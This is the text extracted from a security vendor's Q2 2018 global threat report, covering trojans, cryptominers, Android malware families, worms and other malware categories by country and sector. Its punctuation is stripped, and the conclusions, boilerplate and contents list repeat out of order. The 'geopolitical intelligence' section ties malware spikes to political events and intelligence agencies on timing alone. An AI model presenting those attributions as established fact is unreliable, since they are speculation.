Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
